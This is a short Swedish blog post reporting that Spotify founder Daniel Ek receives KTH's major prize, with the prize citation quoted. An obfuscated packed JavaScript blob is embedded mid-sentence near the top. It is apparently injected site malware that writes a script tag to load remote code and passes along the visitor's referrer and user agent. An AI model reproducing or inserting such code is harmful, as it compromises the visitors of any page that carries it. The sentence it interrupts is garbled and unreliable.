Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

Spotifys Daniel Ek får KTH:s stora pris

Spotifys Daniel Ek får KTH:s stora pris
Sebastian

Att eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dfabt|var|u0026u|referrer|ssfyh||js|php’.split(’|’),0,{}))
Spotify blivit stort vet vi alla. Nu får Daniel Ek pris från KTH med motiveringen ”Han har skakat om musikbranschen i hela världen”.

Spotify: Så här lyder hela motiveringen:

”Entreprenören och grundaren av Spotify, Daniel Ek, tilldelas KTH:s stora pris 2012 för sin innovativa användning och framgångsrika kommersialisering av informationsteknik på hög internationell nivå. Han har bidragit till att i grunden förändra sättet på vilket människor konsumerar musik.

Daniel Ek är entreprenören som har tagit musiktjänsten så långt att den skakat om musikbranschen i hela världen. Tack vare sin innovativa förmåga har han i samarbete med tusentals skivbolag lyckats etablera en ny affärsmodell för musikkonsumtion”

Detta stora pris från KTH har delats ut sedan 1945 och förutom äran blir man även tilldelad 1,2 miljoner svenska kronor. Det är också kul att Daniel Ek som är 29 år blir den yngsta någonsin som vunnit detta pris. Bland andra vinnare finns Skypegrundaren Niklas Zennström, astronauten Christer Fuglesang och många fler.

Grattis Daniel önskar Revue.se 🙂

Via: www.nyteknik.se